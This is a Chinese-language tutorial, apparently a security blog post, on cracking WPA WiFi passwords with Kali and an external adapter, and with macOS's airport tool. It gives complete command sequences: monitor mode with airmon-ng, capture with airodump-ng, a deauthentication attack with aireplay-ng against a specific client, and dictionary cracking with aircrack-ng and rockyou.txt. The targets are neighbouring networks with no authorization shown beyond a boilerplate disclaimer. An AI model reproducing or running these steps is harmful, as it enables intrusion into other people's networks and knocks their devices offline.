首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >两种WIFI破解的方法

两种WIFI破解的方法

作者头像
乌鸦安全
发布2021-08-05 10:43:07
发布2021-08-05 10:43:07
11.4K1
举报
文章被收录于专栏:乌鸦安全乌鸦安全

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经授权,不得用于其他。

声明

本文只是提供一个思路,目的是为了提升学习渗透的兴趣,禁止用于非法操作,否则后果自负 !!!

当然现在已经2021年了,谁还破WiFi,但是为了近源渗透,所以在这又来老生常谈了一次,这里使用了Kali和外置网卡以及mac破解Wi-Fi的方法。

视频教程链接地址:

代码语言:javascript
复制
https://space.bilibili.com/29903122

01 外置网卡版

1.准备工作

首先你得有一个外置网卡,然后用虚拟机进行破解

所需要的设备:kali linux 外置网卡

要将虚拟机设置为:桥接模式

将插入的外接网卡设置为:

ifconfig看下:

2.开始攻击

将wlan0网卡开启混杂模式

代码语言:javascript
复制
airmon-ng start wlan0
#提示要杀掉一些进程,根据提示进行即可
airmon-ng check kill 

airmon-ng start wlan0

开始抓包:

首先,查看附近WiFi热点,使用命令

代码语言:javascript
复制
airodump-ng wlan0mon

选取其中信号较好的WiFi热点,在这里我们选取一个目标(A4-306 2.4G)

使用airodump-ng对选取的WiFi热点进行cap监听与获取:

代码语言:javascript
复制
airodump-ng -c 6 --bssid 88:25:93:60:C0:D9  -w A4-3062.4G wlan0mon(保存文件名称) 
-c 通道值 WiFi热点所对应的CH值(上图中可看到) 
--bssid 需要破解WiFi的MAC值 
-w cap文件名 wlan0mon 启用混杂模式的网卡名

这个时候看到有12个设备进行了连接,选取一个为75-D7的进行抓包:(需要一直开启)

使用aireplay-ng 对选取的WiFi热点进行cap监听与获取:(再启动一个命令行)

代码语言:javascript
复制
aireplay-ng -0 2 -c E8:4E:06:21:75:D7  -a 88:25:93:60:C0:D9 wlanmon  

-0 death模式
2为发送次数
-c 你所选择要断网操作的客户机MAC 
-a WiFi热点MAC

有时候一次抓不到,多试几次,我试了三次之后,抓到了:

这个时候监听就可以停止了。

3. 跑包

我们直接使用kali自带的,在文件目录中,需要解压(这里不做演示)

代码语言:javascript
复制
#首先ls查看当前目录所产生的握手包 aircrack-ng -w rockyou.txt A4-3062.4G-02.cap
-w代表字典 接着你的包名称

然后就等结果吧!(其实如果wifi密码复杂的话,基本上很难跑出来)

这个只是一个笔记,现在暴力破解的太难了,wifi密码稍微一复杂,基本就无望。

4. 2019年11月更新

现在使用kali自带的aircrack好像已经过时了,我在网上看到有更好、能跑GPU的工具了,具体的名字忘了,大家可以自行搜索,另外很多人再问我的无线网卡的型号,我的记得就30左右,不用买太好的,一般的就行:

最重要的还是字典问题,当然还有一种破解的方法是对pin包检测,但是那种方法只适合更老的路由器设备,现在的路由器基本上都可以防pin了,所以在这里就不再演示了。

02 macos版本方案

mac自带了airport工具

2.1 使用ariport

代码语言:javascript
复制
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

2.2 发现附近Wi-Fi

代码语言:javascript
复制
airport -s

2.3 侦听数据

代码语言:javascript
复制
airport en0 sniff 1   # 1代表信道

此时Wi-Fi图标发现改变

一段时间后手动结束侦听,这里是为了抓到握手包

2.4 分析流量

代码语言:javascript
复制
aircrack-ng  airportSniffkZzYWr.cap

其中可以看到 4-401已经抓到了握手包

2.5 aircrack破解

代码语言:javascript
复制
aircrack-ng -w dict.txt -b c0:61:18:11:d9:dc /tmp/airportSniffLbhZSp.cap
代码语言:javascript
复制
参考链接:https://blog.csdn.net/qq_39498701/article/details/104262468

tips:加我wx,拉你入群,一起学习

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-07-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 乌鸦安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1.准备工作
  • 2.开始攻击
  • 3. 跑包
  • 4. 2019年11月更新
  • 2.1 使用ariport
  • 2.2 发现附近Wi-Fi
  • 2.3 侦听数据
  • 2.4 分析流量
  • 2.5 aircrack破解
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档